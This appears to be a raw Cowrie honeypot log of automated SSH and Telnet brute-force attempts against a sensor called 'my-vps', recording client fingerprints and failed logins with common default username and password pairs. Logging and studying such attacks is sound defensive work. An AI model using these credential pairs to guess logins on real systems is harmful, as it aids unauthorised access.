{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:51.218935Z","src_ip":"212.227.125.160","session":"da2a94978054"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55973,"dst_ip":"1.2.3.4","dst_port":23,"session":"f2f216378ca3","protocol":"telnet","message":"New connection: 212.227.235.229:55973 (1.2.3.4:23) [session: f2f216378ca3]","sensor":"my-vps","timestamp":"2025-08-26T11:51:51.311048Z"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:52.027298Z","src_ip":"212.227.125.160","session":"da2a94978054"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:53.096305Z","src_ip":"212.227.125.160","session":"da2a94978054"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37862,"dst_ip":"1.2.3.4","dst_port":22,"session":"d33f5ad36c6f","protocol":"ssh","message":"New connection: 196.251.86.249:37862 (1.2.3.4:22) [session: d33f5ad36c6f]","sensor":"my-vps","timestamp":"2025-08-26T11:51:53.335224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:53.927190Z","src_ip":"196.251.86.249","session":"d33f5ad36c6f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:51:53.928125Z","src_ip":"196.251.86.249","session":"d33f5ad36c6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46178,"dst_ip":"1.2.3.4","dst_port":22,"session":"308562a74117","protocol":"ssh","message":"New connection: 212.227.235.229:46178 (1.2.3.4:22) [session: 308562a74117]","sensor":"my-vps","timestamp":"2025-08-26T11:51:54.754398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:54.961162Z","src_ip":"212.227.235.229","session":"308562a74117"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:51:54.961902Z","src_ip":"212.227.235.229","session":"308562a74117"}
{"eventid":"cowrie.login.failed","username":"git","password":"qwe123","message":"login attempt [git/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:55.752503Z","src_ip":"196.251.86.249","session":"d33f5ad36c6f"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:56.721707Z","src_ip":"212.227.235.229","session":"308562a74117"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48036,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd6b6ddcf434","protocol":"ssh","message":"New connection: 83.168.105.65:48036 (1.2.3.4:22) [session: fd6b6ddcf434]","sensor":"my-vps","timestamp":"2025-08-26T11:51:57.002533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:57.003324Z","src_ip":"83.168.105.65","session":"fd6b6ddcf434"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:57.042768Z","src_ip":"83.168.105.65","session":"fd6b6ddcf434"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:57.161807Z","src_ip":"83.168.105.65","session":"fd6b6ddcf434"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:57.403489Z","src_ip":"196.251.86.249","session":"d33f5ad36c6f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:58.202548Z","src_ip":"83.168.105.65","session":"fd6b6ddcf434"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:58.308030Z","src_ip":"212.227.235.229","session":"308562a74117"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60338,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98e51351c38","protocol":"ssh","message":"New connection: 212.227.125.160:60338 (1.2.3.4:22) [session: d98e51351c38]","sensor":"my-vps","timestamp":"2025-08-26T11:51:59.048952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:59.049828Z","src_ip":"212.227.125.160","session":"d98e51351c38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:59.105258Z","src_ip":"212.227.125.160","session":"d98e51351c38"}
{"eventid":"cowrie.login.failed","username":"user3","password":"user3","message":"login attempt [user3/user3] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:59.613094Z","src_ip":"212.227.125.160","session":"d98e51351c38"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:00.885147Z","src_ip":"212.227.125.160","session":"d98e51351c38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32874,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0027fea82f","protocol":"ssh","message":"New connection: 212.227.125.160:32874 (1.2.3.4:22) [session: ec0027fea82f]","sensor":"my-vps","timestamp":"2025-08-26T11:52:04.279709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:04.280735Z","src_ip":"212.227.125.160","session":"ec0027fea82f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:04.334121Z","src_ip":"212.227.125.160","session":"ec0027fea82f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1","message":"login attempt [postgres/1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:04.540547Z","src_ip":"212.227.125.160","session":"ec0027fea82f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:05.608327Z","src_ip":"212.227.125.160","session":"ec0027fea82f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36620,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fd7ea88e9a5","protocol":"ssh","message":"New connection: 212.227.125.160:36620 (1.2.3.4:22) [session: 0fd7ea88e9a5]","sensor":"my-vps","timestamp":"2025-08-26T11:52:06.657259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:06.712709Z","src_ip":"212.227.125.160","session":"0fd7ea88e9a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:52:06.713437Z","src_ip":"212.227.125.160","session":"0fd7ea88e9a5"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:07.358610Z","src_ip":"212.227.125.160","session":"0fd7ea88e9a5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:08.553593Z","src_ip":"212.227.125.160","session":"0fd7ea88e9a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33648,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8e220e7b8fc","protocol":"ssh","message":"New connection: 212.227.125.160:33648 (1.2.3.4:22) [session: b8e220e7b8fc]","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.392520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.393386Z","src_ip":"212.227.125.160","session":"b8e220e7b8fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5175,"dst_ip":"1.2.3.4","dst_port":22,"session":"db8d9cdcd4af","protocol":"ssh","message":"New connection: 212.227.235.229:5175 (1.2.3.4:22) [session: db8d9cdcd4af]","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.396527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.397706Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.450215Z","src_ip":"212.227.125.160","session":"b8e220e7b8fc"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.525394Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:10.663220Z","src_ip":"212.227.125.160","session":"b8e220e7b8fc"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"yusuf","message":"login attempt [yusuf/yusuf] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:11.122065Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:11.717966Z","src_ip":"212.227.125.160","session":"b8e220e7b8fc"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abc123","message":"login attempt [yusuf/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:12.257411Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47990,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9154b18368c","protocol":"ssh","message":"New connection: 83.168.105.65:47990 (1.2.3.4:22) [session: d9154b18368c]","sensor":"my-vps","timestamp":"2025-08-26T11:52:12.260461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:12.261495Z","src_ip":"83.168.105.65","session":"d9154b18368c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:12.300852Z","src_ip":"83.168.105.65","session":"d9154b18368c"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:12.420674Z","src_ip":"83.168.105.65","session":"d9154b18368c"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abcd123","message":"login attempt [yusuf/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:13.389032Z","src_ip":"212.227.235.229","session":"db8d9cdcd4af"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:13.461070Z","src_ip":"83.168.105.65","session":"d9154b18368c"}
